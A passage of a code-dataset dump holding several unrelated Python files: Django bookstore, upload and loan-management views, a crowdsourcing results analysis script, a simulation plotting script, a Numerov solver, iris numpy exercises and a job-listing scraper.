newOrder.order_id)\n newOrder.user_id = Customer.objects.get(user_id = user_id)\n newOrder.store_id = store_list[i]\n newOrder.total_price = price_list[i]\n newOrder.address_no = address_no\n newOrder.status = 'Processing'\n newOrder.save()\n print(\"This ID: \", newOrder.order_id)\n order_id.append(newOrder.order_id)\n\n count =0\n for book in all_orders:\n newBook = Book_ordered()\n print(\"New Book Book_ordered_id:\", newBook.Book_ordered_id)\n newBook.book_id = book.book_id\n newBook.store_id = book.store_id\n newBook.order_id = Order.objects.get(order_id = order_id[book_store_ind[count]])\n newBook.no_of_copies = book.no_of_copies\n newBook.save()\n print(\"New Book Book_ordered_id:\", newBook.Book_ordered_id)\n count +=1\n \n Cart.objects.filter(user_id = user_id ).delete()\n messages.success(request, 'Order Placed Successfully')\n return redirect('profile')\n else:\n messages.error(request, 'Please Log In First')\n return redirect('index')\n\n#Returns all the order made by the user\ndef userOrders(request):\n return HttpResponse(\"Orders by the user\")\n\ndef userOrderComplain(request):\n return HttpResponse(\"Return Complain correspoding to this user and a given order\")\n\ndef userBookReveiw(request):\n return HttpResponse(\"Helps in reviewing a book by user\")\n\n\n#To display the To Read List of the user\ndef userBookList(request):\n if request.session['user_id'] :\n user_id = request.session['user_id']\n if request.method == 'POST':\n return redirect('index')\n BookObjectList = To_read_list.objects.filter(user_id= user_id)\n book_list= []\n for book in BookObjectList:\n book_object = Book.objects.filter(book_id = book.book_id.book_id)\n for book_fin in book_object:\n book_list.append({'title':book_fin.title, 'author': book_fin.author, 'book_id':book_fin.book_id})\n return render(request, 'users/book_list.html', {'book_list':book_list})\n else:\n messages.warning(request,'You are logged in. 
\n#Returns all the orders made by the user\ndef userOrders(request):\n return HttpResponse(\"Orders by the user\")\n\ndef userOrderComplain(request):\n return HttpResponse(\"Returns complaints corresponding to this user and a given order\")\n\ndef userBookReveiw(request):\n return HttpResponse(\"Helps in reviewing a book by the user\")\n\n\n#To display the To Read List of the user\ndef userBookList(request):\n if request.session['user_id'] :\n user_id = request.session['user_id']\n if request.method == 'POST':\n return redirect('index')\n BookObjectList = To_read_list.objects.filter(user_id= user_id)\n book_list= []\n for book in BookObjectList:\n book_object = Book.objects.filter(book_id = book.book_id.book_id)\n for book_fin in book_object:\n book_list.append({'title':book_fin.title, 'author': book_fin.author, 'book_id':book_fin.book_id})\n return render(request, 'users/book_list.html', {'book_list':book_list})\n else:\n messages.warning(request,'You are not logged in. Please log in')\n return redirect('index')\n\n#To remove a Book from the user's read list\ndef userRemoveBook(request, book_id):\n if request.session['user_id'] :\n user_id = request.session['user_id']\n if request.method == 'POST':\n return redirect('profile')\n To_read_list.objects.filter(book_id = book_id, user_id = user_id).delete()\n else:\n messages.warning(request,'You are not logged in. Please log in')\n return redirect('index')\n\ndef userAddAddress(request):\n if request.session['user_id']:\n user_id = request.session['user_id']\n if request.method == \"POST\":\n form = userAddressForm(request.POST)\n count_add = Customer_address.objects.filter(user_id = user_id)\n add_num = 0\n for add in count_add:\n add_num += 1\n if form.is_valid():\n print(form)\n address = Customer_address()\n address.user_id = Customer.objects.get(user_id =user_id)\n address.address_line1 = form.cleaned_data.get('address_line1')\n address.address_line2 = form.cleaned_data.get('address_line2')\n address.city = form.cleaned_data.get('city')\n address.district = form.cleaned_data.get('district')\n address.state = form.cleaned_data.get('state')\n address.zip_code = form.cleaned_data.get('zip_code')\n address.address_no = add_num +1\n address.save()\n messages.success(request, \"Address saved successfully\")\n return redirect('profile')\n else:\n form = userAddressForm()\n print(form)\n return render(request, 'users/addAddress.html', {'form': form})\n else:\n messages.error(request,\"Please Login First!\")\n return redirect('index')\n\n\ndef viewBook(request, book_id):\n print(book_id)\n sellers= Book_available.objects.filter(book_id = book_id)\n\n book = Book.objects.get(book_id = book_id)\n return render(request, 'users/viewBook.html', {'book': book, 'sellers': sellers})\n\n\ndef searchBooks(request):\n search_term = ''\n\n if 'search' in request.GET:\n search_term = request.GET['search']\n filter = request.GET['filter']\n if(filter == 'title'):\n books = Book.objects.filter( title__contains=search_term )\n if(filter == 'genre'):\n books = Book.objects.filter( genre__contains=search_term )\n if(filter == 'publisher'):\n books = Book.objects.filter( publisher__contains=search_term ) \n if(filter == 'author'):\n books = Book.objects.filter( author__contains=search_term )\n # books = Book.objects.all()\n print(books)\n return render(request, 'users/searchResult.html', {'books' : books, 'search_term': search_term, 'filter': filter })\n
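\n# A hedged alternative to the field-by-field branching above: Django's Q\n# objects can search several fields in one query (sketch only, not wired in):\n#\n# from django.db.models import Q\n# books = Book.objects.filter(\n# Q(title__contains=search_term) | Q(author__contains=search_term))\n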
#Store Owner\n\ndef storeSignUp(request):\n if request.method == \"POST\":\n form = StoreSignUp(request.POST)\n if form.is_valid():\n email = form.cleaned_data.get('email')\n userCount = Book_store.objects.filter(email = email).count()\n if userCount == 0:\n form.save()\n username = form.cleaned_data.get('store_name')\n messages.info(request, f\"You have now signed up as {username}\")\n return redirect('index')\n else:\n messages.error(request, 'Email Address already exists')\n else:\n messages.error(request, \"Invalid Form\")\n else:\n form = StoreSignUp()\n return render(request, 'store/storeSignUp.html', {\"form\":form})\n\n\ndef storeLogin(request):\n if request.method == \"POST\":\n print(\"request received\", request)\n form = storeLoginForm(request.POST)\n if form.is_valid():\n print(\"form received \", form)\n #return redirect('index');\n email = form.cleaned_data.get('email')\n raw_password = form.cleaned_data.get('password')\n userCount = Book_store.objects.filter(email = email, password = raw_password).count()\n #user = Book_store.objects.filter(email = email, password = raw_password)\n if userCount == 1:\n #print(user)\n messages.info(request, f\"You are now logged in with Email Id: {email}\")\n #curr_store = Book_store.objects.filter(email = email, password = raw_password).first()\n request.session['email'] = request.POST['email']\n return redirect('storeProfile')\n else:\n print(\"Invalid Form\")\n messages.error(request, \"Invalid Email or Password\")\n else:\n print(\"Invalid Form Input\")\n messages.error(request, \"Invalid Email or PASSWORD\")\n form = storeLoginForm()\n return render(request, \"store/storeLogin.html\", context= {\"form\":form})\n\ndef storeProfile(request):\n if request.session.has_key('email'):\n posts = request.session['email']\n query = Book_store.objects.filter(email = posts)\n return render(request, 'store/storeProfile.html', {\"query\":query})\n else:\n return redirect('index')\n\ndef storeLogout(request):\n try:\n del request.session['email']\n except KeyError:\n pass\n return redirect( 'index')\n\ndef storeBookAdd(request):\n if request.method == \"POST\":\n form = bookAddForm(request.POST)\n if form.is_valid():\n newUser = Book()\n newUser.title = form.cleaned_data.get('title')\n newUser.author = form.cleaned_data.get('author')\n newUser.publisher = form.cleaned_data.get('publisher')\n newUser.genre = form.cleaned_data.get('genre')\n newUser.year_of_publish = form.cleaned_data.get('year_of_publish')\n num_copies = form.cleaned_data.get('no_of_books')\n this_book_count = Book.objects.filter(title = newUser.title, author = newUser.author).count()\n if this_book_count == 0:\n newUser.copies_sold = 0\n newUser.save()\n bookAndStore = Book_available()\n bookAndStore.store_email = Book_store.objects.filter(email = request.session['email']).first()\n bookAndStore.book_id = newUser\n bookAndStore.no_of_copies = num_copies\n bookAndStore.price = form.cleaned_data.get('price')\n bookAndStore.save()\n else:\n book_id = Book.objects.filter(title = newUser.title, author= newUser.author)[0].book_id\n store_email = Book_store.objects.filter(email = request.session['email']).first()\n myBook = Book_available.objects.filter(book_id = book_id, store_email = store_email).count()\n if myBook == 0:\n myBook = Book_available()\n myBook.book_id = Book.objects.get(title = newUser.title, author = newUser.author)\n myBook.store_email = store_email\n else:\n myBook = Book_available.objects.get(book_id = book_id, store_email = store_email)\n myBook.no_of_copies = myBook.no_of_copies + num_copies\n myBook.save()\n else:\n messages.error(request, \"Invalid Book Data Entered\")\n else:\n addBookForm = bookAddForm()\n return render(request, 'store/addBook.html',{\"form\":addBookForm})\n \n if request.session.has_key('email'):\n posts = request.session['email']\n query = Book_store.objects.filter(email = posts)\n return render(request, 'store/storeProfile.html', {\"query\":query})\n else:\n messages.error(request, \"Please Log In First\")\n return redirect('index') \n\ndef storeBookDel(request):\n return HttpResponse(\"Helps in removing books from the store book list\")\n\ndef storeBookView(request):\n return HttpResponse(\"Returns all the books corresponding to the store\")\n\ndef storeUpdateBook(request):\n return HttpResponse(\"Page for updating information corresponding to a book\")\n\ndef storeOrderList(request):\n return HttpResponse(\"Returns the order list for the store\")\n\n#Extracts data from the order schema and returns books according to status \ndef storeSalesList(request):\n return HttpResponse(\"Returns the sales list\")\n\n#Uses user_id and 
store_id \n\ndef storeUserList(request):\n return HttpResponse(\"Returns the user who bought books from this store\")\n\n\n#Independent of Store and User\ndef trendingList(request):\n return HttpResponse(\"Returns the best selling books top 10 \")\n\n","sub_path":"newApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"612006052","text":"from django import forms\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.views.decorators.http import require_http_methods\n\nfrom pic.models import Scene, Submission\n\n\ndef index(request):\n return render(request, 'pic/index.html',\n {'all_pics': Scene.objects.all(),\n 'all_subs': Submission.objects.all()})\n\n\nclass ImageUploadForm(forms.Form):\n images = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\nclass GifUploadForm(forms.Form):\n gifs = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n@require_http_methods([\"POST\"])\ndef upload_pic(request):\n form = ImageUploadForm(request.POST, request.FILES)\n if form.is_valid():\n for file in form.files.getlist('images'):\n m = Scene.objects.create()\n m.pic = file\n m.save()\n return redirect(reverse('index'))\n\n@require_http_methods([\"POST\"])\ndef upload_gif(request):\n form = GifUploadForm(request.POST, request.FILES)\n # if form.is_valid(): # form isnt valid?\n for file in form.files.getlist('gifs'):\n m = Submission.objects.create()\n m.scene = Scene.objects.first()\n m.gif = file\n m.save()\n return redirect(reverse('index'))\n\n\ndef scene_list(request):\n scenes = []\n for p in Scene.objects.all():\n scenes.append([{'id': p.id,\n 'url': 'https://localhost:8000/media/' + p.pic.url}])\n return JsonResponse({'scenes': scenes})\n\n\ndef submission_list(request, scene_id):\n submissions = []\n for s in Submission.objects.filter(scene=scene_id):\n submissions.append([{'id': s.id,\n 'gif_url': 'https://localhost:8000/media/' + s.gif.url}])\n return JsonResponse({'submissions': submissions})","sub_path":"spike/pic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"424121870","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 24 00:05:56 2018\n\n@author: chenhx1992\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom numpy import genfromtxt\n\n\nfilelist = np.array(genfromtxt('./Subjective_AMT/batch_N_A.txt'), dtype=int)\ndf = pd.DataFrame(index = filelist)\n\ndata = pd.read_csv('./Subjective_AMT/Batch_3410045_N_A_results.csv')\n\n# ApprovedData = data[data['AssignmentStatus']=='Approved']\nApprovedData = data\n\nApprovedWorker = ApprovedData['WorkerId']\n\nUniqueWorker = ApprovedWorker.unique()\n\nnumofWorker = UniqueWorker.shape[0]\n\nchoice_arr = ['optionA', 'optionB']\nchoices = ['Input.image_A_url', 'Input.image_B_url']\n \ncount = 1\nnumofworkerlessthan10 = 0\nfor element in UniqueWorker:\n info = ApprovedData[ApprovedData['WorkerId'] == element][['WorkTimeInSeconds','Input.image_A_url', 'Input.image_B_url', 'Answer.choice']]\n \n # if info.shape[0] < 5:\n # numofworkerlessthan10+=1\n # continue\n \n diff = 0\n l2 = 0\n print(\"{}th Worker {} complete {} tasks.\".format(count, element, info.shape[0]))\n count = 
count + 1\n # print(info)\n for index, rows in info.iterrows():\n \n a = rows['Answer.choice']\n idx = choice_arr.index(a)\n \n pic_name = info.loc[index,choices[idx]]\n if pic_name.startswith('KAQ'):\n continue\n \n # print(pic_name)\n pic_idx, res = pic_name.split('_')\n pic_idx = pic_idx.lstrip('R')\n res = res.rstrip('.png')\n df.loc[int(pic_idx), element] = res\n \n if res == 'l2':\n l2+=1\n if res == 'diff':\n diff+=1\n print('Choices: {} l2, {} diff'.format(l2, diff))\n # if count >=1:\n # break\n\n\n# df = df.drop(['max_occur_item','max_occur','total_occur'], axis=1) \n\nstatistic = np.zeros((50, 3))\nstatistic[:,0] = filelist\ncount = 0\nfor index, rows in df.iterrows():\n # max_occur_item = df.loc[index].value_counts().idxmax()\n # max_occur = df.loc[index].value_counts().max()\n # total_occur = sum(df.loc[index].value_counts())\n # df.loc[index, 'max_occur_item'] = max_occur_item\n # df.loc[index, 'max_occur'] = max_occur\n # df.loc[index, 'total_occur'] = total_occur\n tmp = df.loc[index].value_counts()\n \n for row in tmp.index:\n if row == 'l2':\n statistic[count, 1] = tmp['l2']\n if row == 'diff':\n statistic[count, 2] = tmp['diff'] \n count = count+1\n\n\nimport matplotlib.pyplot as plt\nind = np.arange(50)\nwidth = 0.5\np1 = plt.bar(ind, statistic[:,1], width)\np2 = plt.bar(ind, statistic[:,2], width, bottom=statistic[:,1])\nplt.legend((p1[0], p2[0]), ('L2-norm', 'Smooth'))\nplt.ylabel('Number of Times Selected')\nplt.xlabel('Index of Test Signals') \n\nl2_win = 0\nl2_largewin = 0\ndiff_win = 0\ndiff_largewin = 0\n\nfor i in range(50):\n if statistic[i,1] >= 4:\n l2_win += 1\n l2_largewin += 1\n else:\n if statistic[i,1] == 3:\n l2_win += 1\n \n if statistic[i,2] >= 4:\n diff_win += 1\n diff_largewin += 1\n else:\n if statistic[i,2] == 3:\n diff_win += 1 \nprint(l2_win, l2_largewin, diff_win, diff_largewin)\n\nwin_arr = np.zeros(3)\nfor i in range(50):\n tmp = statistic[i, 1:4]\n total = sum(tmp)\n max_val = np.max(tmp)\n max_idx = np.argmax(tmp)\n if max_idx == 0:\n print(i, statistic[i])\n if max_val > total*0.5:\n win_arr[max_idx] += 1 \n else:\n if len(np.argwhere(tmp==max_val)) == 1:\n win_arr[max_idx] += 1\n # else:\n # print(i, statistic[i])\n \nprint(win_arr)","sub_path":"AmtRes2col.py","file_name":"AmtRes2col.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"225535936","text":"import datetime\n\nfrom django.http import HttpResponse\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.models import User\n\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom .models import ProfileData,LoanData,EmailData\nfrom .serializers import ProfileSerializer, UserSerializer, LoanSerializer, LoanClearSerializer\n\n\nclass UserRegister(APIView):\n serializer_class = UserSerializer\n\n def post(self, request, format=None):\n serializer = UserSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass CurrentUserView(APIView):\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n serializer = UserSerializer(request.user)\n return Response(serializer.data)\n\nclass LoanView(APIView):\n permission_classes = [IsAuthenticated]\n 
serializer_class = LoanSerializer\n def get(self,request):\n serializer = LoanSerializer(request.user)\n return Response(serializer.data)\n def post(self,request):\n data1 = ProfileData.objects.get(username=self.request.user)\n loan_stat = LoanData.objects.filter(username__username=data1).values('loan_status')\n det = len(loan_stat)\n if det != 0 and loan_stat[det-1]['loan_status'] == True: # guard the index so an empty queryset cannot raise\n return Response({'msg': \"Please clear the existing loan before taking another one\"})\n data = request.data\n serializer = LoanSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n alert_date=datetime.date.today()+datetime.timedelta(days=serializer.data['Loan_period']-1)\n Email= EmailData.objects.create(username=data1,alert_date=alert_date)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass LoanStatement(APIView):\n permission_classes = [IsAuthenticated]\n def get(self,request):\n data1=ProfileData.objects.get(username=self.request.user)\n data = LoanData.objects.filter(username__username=data1).values('loan_amount','Loan_period','loan_status','Date','STATUS')\n det = len(data)\n if det == 0:\n return Response({'Loan details': \"You haven't taken any loan\"})\n return Response(data)\n\nclass LoanStatus(APIView):\n permission_classes = [IsAuthenticated]\n serializer_class = LoanClearSerializer\n\n def get(self,request):\n data1 = ProfileData.objects.get(username=self.request.user)\n loan_stat = LoanData.objects.filter(username=data1)\n l = len(loan_stat)\n if l != 0:\n loan_stat = loan_stat[l-1] # index only after confirming the queryset is not empty\n if loan_stat.loan_status == True:\n total_days = datetime.date.today()-loan_stat.Date\n Actualdue_date= loan_stat.Date+datetime.timedelta(days=loan_stat.Loan_period)\n if total_days.days <= loan_stat.Loan_period:\n remaining_days = loan_stat.Loan_period - total_days.days\n else:\n remaining_days = total_days.days - loan_stat.Loan_period\n amount=loan_stat.loan_amount\n r=0.6 # annual rate in percent\n t=(1/365)\n sinterest_day= (amount*r*t)/100\n tinterest_day=sinterest_day*total_days.days\n principal_amount = amount+tinterest_day\n
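 # Worked example of the simple-interest step above (illustrative numbers):\n # amount=1000 with r=0.6 (percent per annum) and t=1/365 gives about\n # 0.0164 per day, so 30 days add roughly 0.49 on top of the principal.\n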
 if total_days.days < loan_stat.Loan_period:\n return Response({'Total amount to be paid till date': principal_amount,\n 'Total Number of days remaining to pay loan': str(remaining_days) + ' days',\n 'Actual due date': Actualdue_date,\n 'Instruction': 'Check the below checkbox for closing the loan'})\n elif total_days.days == loan_stat.Loan_period:\n return Response({'Total amount to be paid till date': principal_amount,\n 'Total Number of days remaining to pay loan': str(remaining_days) + ' days',\n 'Loan status': 'Last day to pay loan',\n 'Actual due date': str(Actualdue_date) + '(today)',\n 'Instruction': 'Check the below checkbox for closing the loan'})\n else:\n return Response({'Total amount to be paid till date': principal_amount,\n 'Total Number of days crossed after the due period': str(\n remaining_days) + ' days',\n 'Loan status': 'You have crossed your loan period',\n 'Actual due date': Actualdue_date,\n 'Instruction': 'Check the below checkbox for closing the loan'})\n return Response({'Loan status': 'You do not have any active loan'})\n return Response({'Loan status': \"You haven't taken any loan\"})\n\n def post(self,request):\n data1 = ProfileData.objects.get(username=self.request.user)\n loan_stat = LoanData.objects.filter(username=data1).values('loan_amount','Loan_period','loan_status','Date','STATUS')\n data = request.data\n serializer = LoanClearSerializer(data=data)\n serializer.is_valid()\n dat=serializer.data['loan_status']\n det = len(loan_stat)\n if det != 0 and dat==True and loan_stat[det-1]['loan_status']==True: # guard det before indexing\n loan_stats = LoanData.objects.filter(username=data1)[det-1]\n total_days = datetime.date.today()-loan_stats.Date\n if total_days.days < loan_stats.Loan_period:\n loan_stats.STATUS='Foreclosed'\n loan_stats.loan_status=False\n loan_stats.save()\n return Response({'Loan Status': loan_stats.STATUS})\n elif total_days.days == loan_stats.Loan_period:\n loan_stats.STATUS = 'Disbursed'\n loan_stats.loan_status = False\n loan_stats.save()\n return Response({'Loan Status':loan_stats.STATUS})\n else:\n loan_stats.STATUS = 'Defaulter'\n loan_stats.loan_status = False\n loan_stats.save()\n return Response({'Loan Status': loan_stats.STATUS})\n if det != 0 and loan_stat[det-1]['loan_status']==True:\n return Response({\"Loan status\": \"Check the checkbox to clear loan\"})\n return Response({\"Loan status\":\"You don't have any active loan\"})\n\n\ndef email(request):\n Email = EmailData.objects.filter(alert_date=datetime.date.today())\n recipient_list = []\n for e in Email:\n Udata = User.objects.filter(username=e.username)\n Pdata = ProfileData.objects.filter(username=Udata[0])\n Ldata = LoanData.objects.filter(username=Pdata[0])\n l=len(Ldata)\n if Ldata[l-1].loan_status==True:\n recipient_list.append(Udata[0].email)\n\n Subject = \"Alert!! \"\n Message = \"Tomorrow is the last date to pay your loan amount; please pay it on or before the due date. Ignore if already paid.\"\n email_from = settings.EMAIL_HOST_USER\n send_mail( Subject, Message, email_from, recipient_list )\n Emails = EmailData.objects.filter(alert_date=datetime.date.today())\n Emails.delete()\n return HttpResponse(\"Message sent successfully\")\n","sub_path":"Bankloan/Accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"546005352","text":"from __future__ import division\nimport numpy as np\nimport pandas as pd\nimport itertools\nfrom pylab import *\nfrom itertools import cycle\nrcParams.update({'figure.autolayout': True})\n\ndata_dir = '../Experimental_Data/IWGBNG/'\nfds_dir = '../FDS_Output_Files/'\nplot_dir = '../Figures/'\n\ny_data = [0.2,0.4,0.6,0.8,1.0,1.2]\ny_fds = [0.2,0.4,0.6,0.8,1.0,1.2]\n\ntest_name = 'IWGB_NG_HF_Center_Avg'\nfds_name = 'hfwallcl_avg'\ndistance = ['_0D','_0p5D','_1D','_2D']\n\nfor i in range(len(distance)):\n\tdata = pd.read_csv(data_dir+test_name+'.csv', header=0)\n\tfds = pd.read_csv(fds_dir+fds_name+distance[i]+'.csv', header=0)\n\n\tdata_slice = np.squeeze(np.asarray(data.iloc[[i],1:]))\n\tfds_slice_05 = np.squeeze(np.asarray(fds.iloc[[0],1:]))\n\tfds_slice_10 = np.squeeze(np.asarray(fds.iloc[[1],1:]))\n\n\tfig = figure()\n\terrorbar(data_slice,y_data,xerr=0.15*data_slice,linestyle='None',marker='o',ms=8,color='k',label='Experiment')\n\tplot(fds_slice_05,y_fds,'k',label = 'FDS 05')\n\tplot(fds_slice_10,y_fds,'r',label = 'FDS 10')\n\tax1 = gca()\n\txlabel('Heat Flux (kW/m$^{2}$)', fontsize=20)\n\tylabel('Distance above Burner (m)', fontsize=20)\n\txticks(fontsize=16)\n\tyticks(fontsize=16)\n\tgrid(True)\n\tax = gca()\n\taxis([0, 60, 0, 1.4])\n\tlegend(numpoints=1,loc='upper right',fontsize=16 )\n\tsavefig(plot_dir + test_name + distance[i] + 
'_RI.pdf',format='pdf')\n\tclose()\n\n","sub_path":"Projects/Madrzykowski_Thesis/Plot_Scripts/vert_center_hf_ri.py","file_name":"vert_center_hf_ri.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"310138485","text":"import numpy as np\nimport random\nfrom math import exp, sqrt\nfrom random import randint\nimport matplotlib\nmatplotlib.use('WebAgg')\n\nimport matplotlib.pyplot as plt\n\n# helper functions, maybe not pass c as param\ndef V(c, x):\n if x >= 0 and x <= 1:\n return c*(x*x-x)\n return 0.\n\ndef kn(x, E, c, m=1., h=1.):\n # step() below uses this value as k^2 in the Numerov recurrence, so return\n # 2m(E - V)/h^2 directly (the original sqrt with misplaced parentheses\n # computed sqrt(E - V/h^2) instead)\n return 2.*m*(E - V(c, x))/h**2\n\ndef step(h, xC, xf, xff, E, c, psif, psiff):\n\n return 1/(1 + h*h*kn(xC, E, c)/12) * (\\\n 2*(1 - 5*h*h*kn(xf, E, c)/12) * psif -\\\n (1 + h*h*kn(xff, E, c)/12) * psiff)\n\n\ndef proc(c=1000):\n N = int(1e4)\n x_n = np.linspace(0, 1, N+1)\n k = 4328\n\n Vrand = x_n[k]\n\n h = 1./(N+1)\n\n psi_n = np.zeros(shape=[N+1,]) \n psi_n[0] = exp(-h * sqrt(2*Vrand)) \n psi_n[1] = 1.\n\n psi_n[N] = exp(-h * sqrt(2*Vrand))\n psi_n[N-1] = 1.\n\n for i in range(2, k):\n psi_n[i] = step(h, x_n[i], x_n[i-1], x_n[i-2], Vrand, c, psi_n[i-1],\n psi_n[i-2]) \n\n for i in range(N-2, k, -1):\n psi_n[i] = step(h, x_n[i], x_n[i+1], x_n[i+2], Vrand, c, psi_n[i+1],\n psi_n[i+2]) \n return x_n, psi_n\n\ndef solve():\n \"\"\"\n psi_l'(b)/psi_l(b) = psi_r'(b)/psi_r(b)\n => not necessary for this exercise\n \"\"\"\n return\n\ndef main():\n nodes = []\n for c in range(1,1001):\n x, p = proc(c)\n nodes.append(1-np.count_nonzero(p))\n plt.plot(range(1,1001), nodes)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ex1/numerov.py","file_name":"numerov.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"493652700","text":"import numpy as np\r\n\r\nurl = 'https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data'\r\niris = np.genfromtxt(url, delimiter=',', dtype='object')\r\n\r\n\r\ndef z1():\r\n print(np.unique(iris[..., 4]))\r\n\r\n\r\ndef z2():\r\n out = [0, 0, 0]\r\n data = iris.astype('str')\r\n types = np.unique(data[..., 4]).astype('str')\r\n for x in range(len(types)):\r\n for y in data:\r\n if y[4] == types[x]:\r\n out[x] += 1\r\n print(out)\r\n\r\n\r\ndef z3():\r\n print(iris[..., 0].astype('float').min())\r\n print(iris[..., 1].astype('float').min())\r\n print(iris[..., 2].astype('float').min())\r\n print(iris[..., 3].astype('float').min())\r\n\r\n\r\ndef z4():\r\n f = iris[..., :4].astype('float')\r\n s = iris[..., 4].astype('str')\r\n\r\n\r\ndef z5():\r\n f = iris[..., :4].astype('float')\r\n s = iris[..., 4].astype('str')\r\n types = np.array(['Iris-setosa', 'Iris-versicolor', 'Iris-virginica']).astype('str')\r\n for x in range(len(s)):\r\n if s[x] == types[0]:\r\n s[x] = 0\r\n if s[x] == types[1]:\r\n s[x] = 1\r\n if s[x] == types[2]:\r\n s[x] = 2\r\n s = s.astype('float').reshape(150, 1)\r\n result = np.concatenate((f, s), axis=1)\r\n print(result)\r\n","sub_path":"rozgrzewka/np_5.py","file_name":"np_5.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"591242017","text":"from datetime import datetime\nfrom urllib.parse import urlencode\nfrom multiprocessing import Pool\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\nimport csv\nfrom itertools import product\n\nTOTAL_PAGE_NUMBER = 5 # total number of result pages to crawl per keyword; can be modified\n\n
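# For reference, the search URL assembled in main() below is built with\n# urlencode, which percent-escapes the Chinese parameter values (illustrative\n# call, not part of the original script):\n#\n# urlencode({'jl': '北京', 'kw': 'python', 'p': 1})\n# -> 'jl=%E5%8C%97%E4%BA%AC&kw=python&p=1'\n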
KEYWORDS = ['大数据', 'python', 'java工程师', '数据分析','人工智能'] # search keywords; add or modify as needed\n\n# crawl records for the major cities\nADDRESS = ['全国', '北京', '上海', '广州', '深圳',\n '天津', '武汉', '西安', '成都', '大连',\n '长春', '沈阳', '南京', '济南', '青岛',\n '杭州', '苏州', '无锡', '宁波', '重庆',\n '郑州', '长沙', '福州', '厦门', '哈尔滨',\n '石家庄', '合肥', '惠州', '太原', '昆明',\n '烟台', '佛山', '南昌', '贵阳', '南宁']\n\n\ndef download(url):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'}\n\n response = requests.get(url, headers=headers)\n\n # print(response.status_code)\n\n return response.text\n\n\ndef get_content(html):\n date = datetime.now().date()\n date = datetime.strftime(date, \"%Y-%m-%d\")\n soup = BeautifulSoup(html, 'lxml')\n body = soup.body\n data_main = body.find('div', {'class': 'newlist_list_content'})\n if data_main:\n tables = data_main.find_all('table')\n for i, table_info in enumerate(tables):\n if i == 0:\n continue\n tds = table_info.find('tr').find_all('td')\n zwmc = tds[0].find('a').get_text() # job title\n zw_link = tds[0].find('a').get('href') # job link\n fkl = tds[1].find('span').get_text() # feedback rate\n gsmc = tds[2].find('a').get_text() # company name\n zwyx = tds[3].get_text() # monthly salary\n gzdd = tds[4].get_text() # work location\n gbsj = tds[5].find('span').get_text() # publication date\n tr_brief = table_info.find('tr', {'class': ' newlist_tr_detail'})\n # brief = tr_brief.find('li', {'class': 'newlist_deatil_last'}).get_text()\n yield {\n # 'tds':tds,\n 'zwmc': zwmc,\n 'zw_link': zw_link,\n 'fkl': fkl,\n 'gsmc': gsmc,\n 'zwyx': zwyx,\n 'gzdd': gzdd,\n 'gbsj': gbsj,\n # 'brief':brief,\n 'save_date': date\n }\n\n\ndef save_tocsv(data, file_name):\n with open(file_name, 'a', encoding=\"gbk\", errors='ignore', newline='') as f:\n header = ['zwmc', 'zw_link', 'fkl', 'gsmc', 'zwyx', 'gzdd', 'gbsj', 'save_date']\n f_csv = csv.DictWriter(f, fieldnames=header)\n f_csv.writerows(data)\n\ndef main(args):\n basic_url = 'http://sou.zhaopin.com/jobs/searchresult.ashx?'\n for keyword in KEYWORDS:\n paras = {'jl': args[0],\n 'kw': keyword,\n 'p': args[1] # page number\n }\n url = basic_url + urlencode(paras)\n html = download(url)\n if html:\n data = get_content(html)\n # for item in data:\n # print(\"item is %s\" % type(item))\n save_tocsv(data, 'zhilian.csv')\n\n\nif __name__ == '__main__':\n start = time.time()\n number_list = list(range(TOTAL_PAGE_NUMBER))\n args = product(ADDRESS, number_list)\n pool = Pool()\n pool.map(main, args)\n end = time.time()\n print('Finished, task runs %s seconds.' 
